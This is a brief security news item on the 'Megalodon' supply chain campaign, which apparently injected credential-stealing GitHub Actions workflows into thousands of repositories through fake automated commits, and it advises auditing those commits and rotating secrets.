Megalodon Supply Chain Attack Infects 5,500+ GitHub Repositories

The Megalodon supply chain campaign compromised 5,500+ GitHub repositories by pushing fake automated commits that injected malicious GitHub Actions workflows. The injected payloads were designed to steal credentials, CI secrets, API keys, and tokens from any pipeline triggered after the poisoned commit landed.

The attack used the appearance of legitimate automated tooling to avoid immediate suspicion. Organizations should audit recent automated commits in their repos and rotate any secrets that may have been exposed during the affected window.